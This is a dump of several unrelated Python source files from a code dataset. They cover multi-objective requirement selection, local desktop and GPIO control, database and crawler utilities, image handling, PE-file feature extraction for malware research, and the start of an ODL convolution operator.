np\n\n\nclass Customer:\n def __init__(self, weighting, requirements):\n self.weighting = weighting\n self.requirements = requirements\n\n\nclass Requirement:\n def __init__(self, id, value, cost):\n self.id = id\n self.value = value\n self.cost = cost\n\n\nclass ReleaseProblem(Problem):\n def __init__(self, requirements, budget):\n super(ReleaseProblem, self).__init__(len(requirements), 2)\n self.requirements = requirements\n self.types[:] = Integer(0, 1)\n self.constraints[:] = '<=' + str(budget)\n self.directions[0] = self.MAXIMIZE\n self.directions[1] = self.MINIMIZE\n\n max_value = -1\n max_cost = -1\n\n for req in self.requirements:\n if req.value > max_value:\n max_value = req.value\n if req.cost > max_cost:\n max_cost = req.cost\n\n for req in self.requirements:\n req.value = req.value / max_value\n req.cost = req.cost / max_cost\n\n def evaluate(self, solution):\n sum_value = 0\n sum_cost = 0\n\n for i in range(len(solution.variables) - 1):\n if solution.variables[i] == 1:\n sum_value += solution.problem.requirements[i].value\n sum_cost += solution.problem.requirements[i].cost\n\n solution.objectives[:] = [sum_value, sum_cost]\n solution.constraints[:] = sum_cost\n solution.evaluated = True\n\n\nclass SingleObjReleaseProblem(Problem):\n def __init__(self, requirements, budget, weight):\n super(SingleObjReleaseProblem, self).__init__(len(requirements), 1, 1)\n self.requirements = requirements\n self.types[:] = Integer(0, 1)\n self.constraints[:] = '<=' + str(budget)\n self.directions[0] = self.MAXIMIZE\n self.weight = weight\n\n max_value = -1\n max_cost = -1\n\n for req in self.requirements:\n if req.value > max_value:\n max_value = req.value\n if req.cost > max_cost:\n max_cost = req.cost\n\n for req in self.requirements:\n req.value = req.value / max_value\n req.cost = req.cost / max_cost\n\n def evaluate(self, solution):\n sum_value = 0\n sum_cost = 0\n\n for i in range(len(solution.variables) - 1):\n if solution.variables[i] == 1:\n 
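# Accumulate the normalised value and cost of every selected requirement; note\n                # that the enclosing range(len(solution.variables) - 1) stops one short, so the\n                # final decision variable never contributes to either sum.\n                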
sum_value += solution.problem.requirements[i].value\n sum_cost += solution.problem.requirements[i].cost\n\n solution.objectives = [(self.weight * sum_value) - ((1 - self.weight) * sum_cost)]\n solution.constraints[:] = sum_cost\n solution.evaluated = True\n\n\n# Optimise for the benefit given by a requirement vs. the cost\ndef multi_objective(requirements, budget):\n problem = ReleaseProblem(requirements, budget * sum(req.cost for req in requirements))\n alg = NSGAII(problem)\n alg.run(10000)\n\n plt.scatter([s.objectives[0] for s in alg.result],\n [s.objectives[1] for s in alg.result])\n plt.xlim([min(s.objectives[0] for s in alg.result), max(s.objectives[0] for s in alg.result)])\n plt.ylim([max(s.objectives[1] for s in alg.result), min(s.objectives[1] for s in alg.result)])\n plt.xlabel(\"Value\")\n plt.ylabel(\"Cost\")\n plt.show()\n return alg.result\n\n\n# Optimise for a single objective calculated from the benefit given by a requirement and the cost, at multiple\n# weightings for benefit and cost.\ndef single_objective(requirements, budget):\n weights = np.arange(0.1, 1, 0.05)\n results = []\n\n for weight in weights:\n problem = SingleObjReleaseProblem(requirements, budget * sum(req.cost for req in requirements), weight)\n alg = NSGAII(problem)\n alg.run(10000)\n\n results.append(alg.result[0:10])\n\n cost_value_list = []\n for result_list in results:\n for result in result_list:\n sum_value = 0\n sum_cost = 0\n\n for i in range(0, len(result.variables) - 1):\n if result.variables[i][0]:\n sum_value += requirements[i].value\n sum_cost += requirements[i].cost\n cost_value_list.append([sum_value, sum_cost])\n\n plt.scatter([r[0] for r in cost_value_list], [r[1] for r in cost_value_list])\n plt.xlim([min(r[0] for r in cost_value_list) - 1, max(r[0] for r in cost_value_list) + 1])\n plt.ylim([max(r[1] for r in cost_value_list) + 1, min(r[1] for r in cost_value_list) - 1])\n plt.xlabel(\"Value\")\n plt.ylabel(\"Cost\")\n plt.show()\n return results\n\n\n# Randomly select and evaluate solutions for n iterations, keeping the best.\ndef random_selection(requirements, budget):\n number_iterations = 100\n results = []\n\n for i in range(number_iterations):\n problem = ReleaseProblem(requirements, budget * sum(req.cost for req in requirements))\n alg = NSGAII(problem)\n alg.run(1)\n\n results.append(alg.result[0:10])\n\n cost_value_list = []\n for result_list in results:\n for result in result_list:\n sum_value = 0\n sum_cost = 0\n\n for i in range(0, len(result.variables) - 1):\n if result.variables[i][0]:\n sum_value += requirements[i].value\n sum_cost += requirements[i].cost\n cost_value_list.append([sum_value, sum_cost])\n\n plt.scatter([r[0] for r in cost_value_list], [r[1] for r in cost_value_list])\n plt.xlim([min(r[0] for r in cost_value_list) - 1, max(r[0] for r in cost_value_list) + 1])\n plt.ylim([max(r[1] for r in cost_value_list) + 1, min(r[1] for r in cost_value_list) - 1])\n plt.xlabel(\"Value\")\n plt.ylabel(\"Cost\")\n plt.show()\n return results\n\n\nif __name__ == '__main__':\n # Get the customers and requirements from the files\n customers = []\n costs = []\n requirements = []\n\n budget = 0.5\n\n with open('test/realistic-nrp/nrp-e1-customers') as customer_file:\n for line in customer_file:\n line_list = line.split()\n\n customers.append(Customer(int(line_list[0]), line_list[2:]))\n\n with open('test/realistic-nrp/nrp-e1-requirements') as requirements_file:\n costs = requirements_file.readline().split()\n\n # Find the maximum value for customer weighting\n max_weight = 
-1\n for customer in customers:\n if customer.weighting > max_weight:\n max_weight = customer.weighting\n\n # Normalise the weighting for each customer\n for customer in customers:\n customer.weighting = customer.weighting / max_weight\n\n # Get a list of the value and cost of each requirement\n for i in range(1, len(costs)):\n value = 0\n\n for customer in customers:\n if str(i) in customer.requirements:\n value += customer.weighting * (1 / (customer.requirements.index(str(i)) + 1))\n\n requirements.append(Requirement(i, value, int(costs[i])))\n\n # Run each of the algorithms\n multi_objective(requirements, budget)\n single_objective(requirements, budget)\n random_selection(requirements, budget)\n","sub_path":"handin_3/src/MultiOpt.py","file_name":"MultiOpt.py","file_ext":"py","file_size_in_byte":7164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"357694672","text":"import alsaaudio\nimport base64\nfrom io import BytesIO\nimport pyscreenshot as ImageGrab\nfrom subprocess import call\nimport webbrowser\n\n\nURL_SCHEMES = ('file://',\n 'ftp://',\n 'gopher://',\n 'hdl://',\n 'http://',\n 'https://',\n 'imap://',\n 'mailto://',\n 'mms://',\n 'news://',\n 'nntp://',\n 'prospero://',\n 'rsync://',\n 'rtsp://',\n 'rtspu://',\n 'sftp://',\n 'shttp://',\n 'sip://',\n 'sips://',\n 'snews://',\n 'svn://',\n 'svn+ssh://',\n 'telnet://',\n 'wais://',\n 'ws://',\n 'wss://')\n\n\ndef url_parser(url):\n if url.startswith(URL_SCHEMES):\n return url\n else:\n return 'https://' + url\n\n\ndef close():\n call([\"pkill\", \"chrome\"])\n\n\ndef web_open(url):\n webbrowser.open(url_parser(url), new=0)\n\n\ndef poweroff():\n call(['systemctl', 'poweroff', '-i'])\n\n\ndef reboot():\n call(['systemctl', 'reboot', '-i'])\n\n\ndef screenshot():\n call(['gnome-screenshot'])\n\n\ndef mute():\n vol = alsaaudio.Mixer()\n vol.setvolume(0)\n\n\ndef volume(volume):\n vol = alsaaudio.Mixer()\n vol.setvolume(volume)\n\n\ndef xdotool_key(keys):\n call(['xdotool', 'key', keys])\n\n\ndef get_volume():\n vol = alsaaudio.Mixer()\n value = vol.getvolume()\n return value[0]\n\n\ndef get_screen():\n screen = ImageGrab.grab()\n buffered_screen = BytesIO()\n screen.save(buffered_screen, format='JPEG')\n return base64.b64encode(buffered_screen.getvalue()).decode('utf-8')\n","sub_path":"tools/system_calls.py","file_name":"system_calls.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"184514903","text":"import secret_info\nimport mysql.connector\n\n\ndef is_there(table_name, bil_sira_1, bil_val_1, bil_sira_2, bil_val_2, double_element = False): \n \n \n mydb = mysql.connector.connect(host=\"localhost\", user=secret_info.MySql.user, passwd=secret_info.MySql.passwd, database=secret_info.MySql.DB)\n \n c = mydb.cursor()\n \n sql = \"SELECT * FROM %s\" % table_name\n \n c.execute(sql)\n \n rows = c.fetchall()\n \n sonuc = False\n \n row_say = 0\n \n for row in rows:\n \n row_say += 1\n \n if str(row[int(bil_sira_1)]) == str(bil_val_1):\n \n sonuc = True # yeni kosulda degisebilir\n \n if double_element == True:\n \n if not str(row[int(bil_sira_2)]) == str(bil_val_2):\n \n sonuc = False\n \n else:\n \n sonuc = True\n \n break\n \n \n \n return sonuc\n \n \n# import value_is_there\n# value_is_there.is_there(\"user_logs\", 0, 1, 1, \"2019-09-02\", 
True)","sub_path":"apptrogren/value_is_there.py","file_name":"value_is_there.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"569503408","text":"# -*- coding: utf-8 -*-\n\nimport traceback\n\nimport click\n\nimport pp_dwh_crawler as dwh\nfrom pp_dwh_crawler.dbcrawler.parts import TableRegister, TableNameGenerator, TableReader\n\nlogger = dwh.LoggerFactory.create_logger(__name__)\n\nDWF_DB_CRAWLER_CONFIG = dwh.Config(dwh.Environment.APP_CONFIG_ROOT + '/dbcrawler/pp-dwh-dbcrawler.ini')\nCONFIG_ROOT_PATH = DWF_DB_CRAWLER_CONFIG.get(\"config\", \"root_path\")\nTARGET_TABLE_LIST = dwh.Config.get_target_data_name(CONFIG_ROOT_PATH)\n\n\ndef get_result_code(file_info, results):\n return dwh.ResultCode.SUCCESS\n\n\n@click.group()\ndef cli():\n pass\n\n\n@cli.command()\n@click.option('--target-data', required=True, type=click.Choice(TARGET_TABLE_LIST))\n@click.option('--not-dry-run', is_flag=True, default=False)\n@click.option('--overwrite', is_flag=True, default=False)\ndef simple(target_data, not_dry_run, overwrite):\n\n mailer = dwh.Notification(dwh.Environment.DWH_CONFIG)\n packed_message_param = dict(target_data=target_data,\n not_dry_run=not_dry_run,\n overwrite=overwrite)\n result_code = dwh.ResultCode.ERROR\n config = None\n\n try:\n config = dwh.Config(dwh.Environment.APP_CONFIG_ROOT +\n '/dbcrawler/' + target_data + '/' + target_data + '.ini')\n except Exception as e:\n traceback.print_exc()\n mailer.add_mesaage(ERROR_DB_CRAWLER_TEMPLATE,\n packed_message_param.update(exception=e))\n mailer.send()\n return dwh.ResultCode.ERROR\n\n generator = TableNameGenerator(config)\n register = TableRegister(config)\n reader = TableReader(config)\n table_names = []\n\n try:\n table_names = generator.get_available_table(target_data)\n table_info = reader.get_table_info_all(table_names)\n results = register.regsit_all(table_info, not_dry_run, overwrite)\n result_code = get_result_code(table_info, results)\n packed_message_param.update(table_names=table_names, results=results)\n\n except Exception as e:\n traceback.print_exc()\n mailer.add_mesaage(ERROR_DB_CRAWLER_TEMPLATE,\n packed_message_param.update(exception=e, table_name=table_names))\n mailer.send()\n return dwh.ResultCode.ERROR\n\n mailer.add_mesaage(SUCCESS_DB_CRAWLER_TEMPLATE, packed_message_param)\n mailer.send()\n\n return result_code\n\n\nif __name__ == '__main__':\n\n ERROR_DB_CRAWLER_TEMPLATE = dwh.Environment.APP_TEMPLATE_ROOT + '/dbcrawler/error_db_crawler.jinja2'\n SUCCESS_DB_CRAWLER_TEMPLATE = dwh.Environment.APP_TEMPLATE_ROOT + '/dbcrawler/success_db_crawler.jinja2'\n\n cli()\n","sub_path":"pp_dwh_crawler/dbcrawler/pp_dwh_db_crawler.py","file_name":"pp_dwh_db_crawler.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"143753881","text":"import sys, cv2, dlib, time, os\nimport numpy as np\nimport faceBlendCommon as fbc\nfrom random import uniform\nfrom pyhull.delaunay import DelaunayTri\n\n# PREDICTOR_PATH = '../models/shape_predictor_68_face_landmarks.dat'\n# detector = dlib.get_frontal_face_detector()\n# predictor = dlib.shape_predictor(PREDICTOR_PATH)\noutputSize = 600\n\ndef readImagePaths(path, isRandom=False):\n imagePaths = []\n sortedPaths = sorted(os.listdir(path))\n # sortedPaths.remove('.DS_Store')\n length = len(sortedPaths)\n if isRandom:\n indices = np.random.choice(length,8,replace=False)\n else:\n indices = range(0,length)\n 
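# Keep only the files whose extension marks them as JPEG images.\n    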
for i in indices:\n fileExt = os.path.splitext(sortedPaths[i])[1]\n if fileExt in [\".jpg\", \".jpeg\"]:\n imagePaths.append(os.path.join(path, sortedPaths[i]))\n\n # print(len(imagePaths))\n # print(sortedPaths)\n # print(imagePaths)\n return imagePaths\n\ndef readImages(imagePaths):\n if len(imagePaths) == 0:\n print('No images found with extension jpg or jpeg')\n sys.exit(0)\n\n images = []\n\n for imagePath in imagePaths:\n im = cv2.imread(imagePath)\n if im is None:\n print(\"image:{} not read properly\".format(imagePath))\n else:\n images.append(im)\n\n\n if len(images) == 0:\n print(\"No images found\")\n sys.exit(0)\n\n return images\n\nif __name__ == '__main__' :\n t = time.time()\n\n dirName = \"smoothB\"\n imagePaths = readImagePaths(\"../images/\" + dirName)\n images = readImages(imagePaths)\n\n # for k in range(0, 2):\n istack = []\n for i in range(0, 4):\n jstack = []\n for j in range(0, 6):\n jstack.append(images[4 * j + i])\n # istack.append(np.hstack(jstack))\n # cv2.imshow(\"Face Average\", np.hstack(jstack))\n # cv2.waitKey(0)\n cv2.imwrite(\"../results/\" + dirName + \"_\" + str(i) + \".jpg\", np.hstack(jstack))\n # combined = np.vstack(istack)\n\n # cv2.imwrite(\"../results/\" + dirName + \".jpg\", combined)\n # cv2.destroyAllWindows()\n","sub_path":"week5/compilePictures.py","file_name":"compilePictures.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"335989938","text":"import RPi.GPIO as GPIO\nimport sys as sys\nimport time as time\n\ndef say(msg):\n print(msg);\n sys.stdout.flush()\n\nGPIO.setmode(GPIO.BOARD)\n\n# Set input pins\nbinaryInputPins = [7, 11, 13, 15, 19]\n\n# When voltage changes\ndef my_callback(channel):\n time.sleep(0.01)\n pins = []\n\n for pin in binaryInputPins:\n state = GPIO.input(pin)\n pins.append(str(state))\n\n numStr = ''.join(pins)\n num = int(numStr, 2)\n say('bin:' + str(num))\n\narcadeInputPins = [29, 31, 33]\n\ndef my_arcade_callback(channel):\n time.sleep(0.01)\n pins = []\n state = GPIO.input(channel)\n say('buttonPressed:' + str(channel) + ':' + str(state))\n\n\n\nfor pin in binaryInputPins:\n GPIO.setup(pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.add_event_detect(pin, GPIO.BOTH, callback=my_callback, bouncetime=20)\n\nfor pin in arcadeInputPins:\n GPIO.setup(pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.add_event_detect(pin, GPIO.BOTH, callback=my_arcade_callback, bouncetime=20)\n\nwhile(True):\n data = raw_input().strip().split(':')\n\n if data[0] == 'close':\n break\n\nGPIO.cleanup()\n","sub_path":"soundboard.py","file_name":"soundboard.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"291741692","text":"import logging\nimport database\nimport os\nimport magic\nh_magic = magic.open(magic.MAGIC_NONE)\nh_magic.load()\n\nimport pefile\nimport subprocess\nimport zlib\n\nimport utils\nimport shutil\nimport re\nimport simplejson\nimport ssdeep\n\n\nfrom PyPackerDetect import PackerReport\nfrom PyPackerDetect import PEIDDetector\nfrom PyPackerDetect import BadEntryPointSectionDetector\nfrom PyPackerDetect import LowImportCountDetector\nfrom PyPackerDetect import PackerSectionNameDetector\nfrom PyPackerDetect import NonStandardSectionNameDetector\n\n\nPACKER_DETECT_CONFIG = {\n \"LowImportThreshold\": 10,\n \"NonStandardSectionThreshold\": 3,\n \"BadSectionNameThreshold\": 2,\n \"OnlyPEIDEntryPointSignatures\": True,\n # large 
database has more than 3x as many signatures, but many are for non-packers\n # and will create false positives. we can move signatures from the long list to the short\n # list as needed, though.\n \"UseLargePEIDDatabase\": False,\n\n \"CheckForPEIDSignatures\": True,\n \"CheckForBadEntryPointSections\": True,\n \"CheckForLowImportCount\": True,\n \"CheckForPackerSections\": True,\n \"CheckForNonStandardSections\": True\n}\n\n\nEXT_UNUPXED = \".unupxed\"\n\nLOGFD = open(\"logs/extractors.log\", \"wb\")\n\ndef log(msg):\n LOGFD.write(msg + \"\\n\")\n\n\ndef e_magic(path, file_):\n magic_str = h_magic.file(path)\n logging.debug(\"e_magic: {}\".format(magic_str))\n # if database.record_exists(session, database.Magic, file_):\n # logging.debug(\"e_magic: record exists\")\n \n\n entry = database.Magic(file=file_, magic_str=magic_str)\n # session.add(entry)\n # session.commit()\n return entry\n\n\nCOM_DESC = 14\ndef e_pe(path, file_):\n \"\"\"\n file_id = Column(Integer, ForeignKey(\"file.id\"))\n machine_type = Column(Boolean)\n dotnet = Column(Boolean)\n \"\"\"\n\n # if database.record_exists(session, database.PE, file_):\n # logging.debug(\"e_pe: record exists\")\n # return\n \n try:\n pe = pefile.PE(path)\n except pefile.PEFormatError as e:\n logging.debug(\"e_pe: {}\".format(e))\n return\n\n data_dir = pe.OPTIONAL_HEADER.DATA_DIRECTORY\n is_dotnet = False\n \n if len(data_dir) >= COM_DESC+1:\n \n com_desc = data_dir[14]\n if com_desc.name == \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\":\n # logging.error(\"e_pe: No COM descriptor\")\n if com_desc.VirtualAddress != 0 or com_desc.Size != 0:\n logging.debug(\"e_pe: .NET\")\n is_dotnet = True\n \n entry = database.PE(file=file_, machine_type=pe.FILE_HEADER.Machine, dotnet=is_dotnet)\n # session.add(entry)\n # session.commit()\n return entry\n\n\ndef e_upx(path, file_):\n # if database.record_exists(session, database.UPX, file_):\n # logging.debug(\"e_upx: record exists\")\n # return\n\n \n magic_str = session.query(database.Magic.magic_str).filter_by(file_id=file_.id).first()[0]\n\n logging.debug(\"e_ida_cfg: {}\".format(magic_str))\n\n entry = None\n \n if magic_str.find(\"UPX\") != -1:\n logging.debug(\"e_upx: UPX found\")\n decompressed = path + EXT_UNUPXED\n if not os.path.exists(decompressed):\n logging.debug(\"e_upx: decompressing to {}\".format(decompressed))\n cmd = \" \".join([\"upx\", \"-d\", \"-o{}\".format(decompressed), path])\n res = utils.check_output(cmd)\n success = False\n if not re.search(\"Unpacked 1 file\", res, re.I) or not os.path.exists(decompressed):\n msg = \"e_upx: Error unpacking {}\".format(path)\n log(msg + \"\\n\")\n log(res + \"\\n\")\n \n else:\n success = True\n\n \n entry = database.UPX(file=file_, result=success)\n # session.add(entry)\n # session.commit()\n else:\n logging.debug(\"e_upx: already decompressed\")\n\n # exit()\n return entry\n \nIDA_PATH = \"/home/vadim/ida-7.1/ida64\"\n# IDA_OUTPUT = \"/mnt/tmpfs/ida_output\"\n# IDA_IDB = \"/mnt/tmpfs/tmp.i64\"\nIDA_CFG_SCRIPT = \"utils/extract-cfg.py\"\nTMP_DIR = \"/mnt/tmpfs\"\n\ndef e_ida_cfg(path, file_):\n\n \"\"\"\n if database.record_exists(session, database.IDA_CFG, file_):\n logging.debug(\"e_ida_cfg: record exists\")\n return\n\n\n upx_rec = session.query(database.UPX).filter_by(file_id=file_.id).first()\n if upx_rec:\n logging.debug(\"e_ida_cfg: UPXed binary\")\n decompressed = path + EXT_UNUPXED\n if upx_rec.result and os.path.exists(decompressed):\n logging.debug(\"e_ida_cfg: using decompressed binary: {}\".format(decompressed))\n path = decompressed\n 
\"\"\"\n\n filename = os.path.basename(path)\n idb_path = os.path.join(TMP_DIR, filename + \".i64\")\n ida_out_path = os.path.join(TMP_DIR, filename + \".out\")\n\n\n logging.debug(\"e_ida_cfg: IDB path = {}\".format(idb_path))\n logging.debug(\"e_ida_cfg: IDA Out path = {}\".format(ida_out_path))\n\n script_path = os.path.abspath(IDA_CFG_SCRIPT)\n logging.debug(\"e_ida_cfg: IDA CFG ({})\".format(script_path))\n subprocess.call([\n IDA_PATH,\n \"-A\", \"-c\",\n \"-o{}\".format(idb_path),\n \"-S{}\".format(script_path),\n path])\n\n entry = None\n \n if not os.path.exists(ida_out_path):\n msg = \"e_ida_cfg: error processing: {}\".format(path)\n logging.error(msg)\n log(msg)\n else:\n data = utils.read_file(ida_out_path)\n # print zlib.decompress(data)\n entry = database.IDA_CFG(file=file_, data=data)\n # session.add(entry)\n # session.commit()\n\n \n # Clean up for the next one\n utils.remove(idb_path)\n utils.remove(ida_out_path)\n # exit()\n return entry\n\n\ndef e_pe_features_1(path, file_):\n pe = pefile.PE(path)\n sections = []\n for section in pe.sections:\n sections.append({\n \"name\": utils.b64enc(utils.strip_nulls(section.Name)),\n \"size\": section.SizeOfRawData,\n \"characteristics\": section.Characteristics\n })\n\n imports = []\n if hasattr(pe, 'DIRECTORY_ENTRY_IMPORT'):\n\n for entry in pe.DIRECTORY_ENTRY_IMPORT:\n imports.append({\n \"dll\": entry.dll,\n \"names\": [imp.name if imp.name else imp.ordinal for imp in entry.imports]\n })\n\n exports = []\n if hasattr(pe, 'DIRECTORY_ENTRY_EXPORT'):\n for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:\n #print hex(pe.OPTIONAL_HEADER.ImageBase + exp.address), exp.name, exp.ordinal\n exports.append(exp.name)\n\n\n cb_cnt = 0\n if hasattr(pe, 'DIRECTORY_ENTRY_TLS'):\n cb_rva = pe.DIRECTORY_ENTRY_TLS.struct.AddressOfCallBacks - pe.OPTIONAL_HEADER.ImageBase\n while True:\n try:\n cb_addr = pe.get_dword_from_data(pe.get_data(cb_rva + 4 * cb_cnt, 4), 0)\n except pefile.PEFormatError as e:\n logging.error(str(e))\n break\n if cb_addr == 0:\n break\n cb_cnt += 1\n\n\n named_resources = []\n \n if hasattr(pe, 'DIRECTORY_ENTRY_RESOURCE'):\n\n for rsrc in pe.DIRECTORY_ENTRY_RESOURCE.entries:\n\n for r in rsrc.directory.entries:\n if r.name:\n named_resources.append(r.name.__str__())\n\n # logging.debug(\"rsrc: {} - {}\".format(n_rsrc, resources))\n \n data = {\n \"file_header.characteristics\": pe.FILE_HEADER.Characteristics,\n \"optional_header.subsystem\": pe.OPTIONAL_HEADER.Subsystem,\n \n \"sections\": sections,\n\n \"imports\": imports,\n \"exports\": exports,\n \"n_tls_callbacks\": cb_cnt,\n \"named_resources\": named_resources\n }\n\n # print simplejson.dumps(data, indent=2)\n data = zlib.compress(simplejson.dumps(data))\n\n return database.PE_Features_1(file=file_, data=data)\n\n\ndef e_ssdeep(path, file_):\n pe = pefile.PE(path)\n # print type(pe.__data__[::])\n whole_file = ssdeep.hash(pe.__data__[::])\n # print whole_file\n base = pe.OPTIONAL_HEADER.ImageBase\n ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint\n # print hex(ep)\n\n ep_section = None\n \n for section in pe.sections:\n size = section.Misc_VirtualSize\n if size == 0:\n size = section.SizeOfRawData\n \n if ep >= section.VirtualAddress and ep < section.VirtualAddress + size:\n # print section.Name\n # sect_data = pe.__data__[section.PointerToRawData:section.SizeOfRawData]\n # print sect_data[:10].encode(\"hex\")\n ep_section = ssdeep.hash( pe.get_data(section.VirtualAddress))\n break\n\n if not ep_section:\n logging.error(\"Couldn't fine EP section in {}\".format(path))\n else:\n 
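# Persist both the whole-file ssdeep digest and the digest of the raw bytes of\n        # the section that contains the entry point.\n        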
return database.SSDEEP(file=file_, whole_file=whole_file, ep_section=ep_section)\n\n\ndef e_virustotal(path, file_):\n pass\n\nPACKER_DETECTORS = [\n PEIDDetector.PEIDDetector(PACKER_DETECT_CONFIG),\n BadEntryPointSectionDetector.BadEntryPointSectionDetector(PACKER_DETECT_CONFIG),\n LowImportCountDetector.LowImportCountDetector(PACKER_DETECT_CONFIG),\n PackerSectionNameDetector.PackerSectionNameDetector(PACKER_DETECT_CONFIG),\n NonStandardSectionNameDetector.NonStandardSectionNameDetector(PACKER_DETECT_CONFIG)\n]\n\ndef e_pypackerdetect(path, file_):\n report = PackerReport.PackerReport(path)\n pe = pefile.PE(path)\n \n for detector in PACKER_DETECTORS:\n detector.Run(pe, report)\n \n data = report.GetJson()\n\n if data[\"failed\"]:\n logging.error(\"Couldn't run PyPackerDetct on {}\".format(path))\n return\n\n if data[\"detections\"] == 0 and data[\"suspicions\"] == 0:\n return\n\n logging.debug(\"{}: \".format(os.path.basename(path)))\n for msg in data[\"logs\"]:\n logging.debug(\" {}\".format(msg))\n \n return database.PyPackerDetect(file=file_, data=utils.pack(data))\n\n \n\n# DON't FORGET TO ADD AN ENTRY TO THE TABLES DICT BELOW!\nALL = {\n \"magic\": e_magic,\n \"pe\": e_pe,\n \"upx\": e_upx,\n \"ida_cfg\": e_ida_cfg,\n \"pe_features_1\": e_pe_features_1,\n \"ssdeep\": e_ssdeep,\n \"virustotal\": e_virustotal,\n \"pypackerdetect\": e_pypackerdetect\n}\n\n\nTABLES = {\n \"magic\": database.Magic,\n \"pe\": database.PE,\n \"upx\": database.UPX,\n \"ida_cfg\": database.IDA_CFG,\n \"pe_features_1\": database.PE_Features_1,\n \"ssdeep\": database.SSDEEP,\n \"virustotal\": database.VirusTotal,\n \"pypackerdetect\": database.PyPackerDetect\n}\n","sub_path":"core/extractors.py","file_name":"extractors.py","file_ext":"py","file_size_in_byte":10413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"144674920","text":"from urllib.request import urlretrieve\r\nfrom urllib.error import HTTPError\r\nimport sys\r\n# import os\r\n\r\n\r\ndef download_images(urlstxt, pattern):\r\n with open(urlstxt, 'r', encoding='utf8') as file:\r\n t = f = 0\r\n log = []\r\n\r\n def _progress(count, block_size, total_size):\r\n sys.stdout.write('\\r>> Downloading %s %.1f%%' % (filename,\r\n float(count * block_size) / float(total_size) * 100.0))\r\n sys.stdout.flush()\r\n for i, url in enumerate(file):\r\n if url[-1] in ('\\n', '\\r'):\r\n url = url[:-1]\r\n filename = '{}_{}.jpg'.format(pattern, i)\r\n try:\r\n filepath, _ = urlretrieve(url=url, filename=filename, reporthook=_progress)\r\n print()\r\n t += 1\r\n except HTTPError as e:\r\n print(e)\r\n log.append('HTTPError: {} at file:{} with url:{}\\n'.format(e, filename, url))\r\n f += 1\r\n except Exception as ex:\r\n print(ex)\r\n log.append('Error: {} at file:{} with url:{}\\n'.format(ex, filename, url))\r\n f += 1\r\n print('Successfully downloaded {}'.format(t))\r\n print('Download errors {}'.format(f))\r\n with open('log.txt', 'w', encoding='utf8') as l:\r\n l.writelines(log)\r\n\r\nif __name__ == '__main__':\r\n if len(sys.argv) > 1:\r\n download_images(sys.argv[1], sys.argv[2])\r\n","sub_path":"download_images.py","file_name":"download_images.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"384500175","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 12 10:03:26 2018\n\n@author: lagerwer\n\"\"\"\n\n\nimport odl\nimport numpy as np\nimport pylab\nimport pyfftw\nimport 
time\nimport os\nimport shutil\nfrom tempfile import mkstemp\nfrom scipy.ndimage import gaussian_filter\n# %% Working vars function\nclass working_var_map:\n def __init__(self):\n base_WV_path = 'python_data/working_vars'\n _, temp_name = mkstemp()\n self.WV_path = base_WV_path + temp_name + '/'\n os.makedirs(self.WV_path)\n\n\n def __del__(self):\n shutil.rmtree(self.WV_path, ignore_errors=True)\n# %%\nclass SymOp(odl.Operator):\n def __init__(self, dom, ran):\n odl.Operator.__init__(self, domain=dom, range=ran, linear=True)\n self.dom = dom\n self.ran = ran\n\n def _call(self, x):\n u = np.asarray(x)\n return np.concatenate([u[-1:], u[::-1], u[1:]])\n\n @property\n def adjoint(self):\n functional = self\n\n class AdjSymOp(odl.Operator):\n def __init__(self):\n super().__init__(domain=functional.range,\n range=functional.domain, linear=True)\n\n def _call(self, x):\n u = np.asarray(x)\n mid = int(np.floor(np.size(u) / 2))\n x_out = u[mid:] + u[mid-1::-1]\n return x_out\n\n @property\n def adjoint(self):\n return functional\n return AdjSymOp()\n\n\n# %%\nisft = np.fft.ifftshift\nclass ConvolutionOp(odl.Operator):\n def __init__(self, filter_space, data_space, det_space, g_w, a_wc):\n odl.Operator.__init__(self, domain=filter_space, range=data_space, linear=True)\n\n self.rs_detu = int(2**(np.ceil(np.log2(np.size(filter_space)))+1))\n self.frs_detu = int(self.rs_detu/2 + 1)\n self.rs_filt = odl.ResizingOperator(filter_space,\n ran_shp=(self.rs_detu,))\n self.gw = np.asarray(g_w)\n self.a_wc = a_wc\n self.w_detu = self.rs_filt.domain.weighting.const\n self.det_tr_space = odl.uniform_discr([det_space.min_pt[1], det_space.min_pt[0]],\n [det_space.max_pt[1], det_space.max_pt[0]],\n (np.size(det_space, 1), np.size(det_space, 0)))\n self.rs_det = odl.ResizingOperator(self.det_tr_space,\n ran_shp=(np.size(self.range, 2),\n self.rs_detu))\n self.flt = 'float32'\n self.clx = 'complex64'\n self.flt1 = 'float64'\n self.clx1 = 'complex128'\n thrds = 8\n self.d_a = pyfftw.empty_aligned((np.size(self.range, 2), self.rs_detu),\n dtype=self.flt)\n self.d_b = pyfftw.empty_aligned((np.size(self.range, 2), self.frs_detu),\n dtype=self.clx)\n self.fft_d = pyfftw.FFTW(self.d_a, self.d_b, axes=(1,), threads=thrds)\n self.id_a = pyfftw.empty_aligned((np.size(self.range, 2), self.frs_detu),\n dtype=self.clx)\n self.id_b = pyfftw.empty_aligned((np.size(self.range, 2), self.rs_detu),\n dtype=self.flt)\n self.ifft_d = pyfftw.FFTW(self.id_a, self.id_b, axes=(1,), threads=thrds, direction='FFTW_BACKWARD')\n\n\n self.f_a = pyfftw.empty_aligned(self.rs_detu, 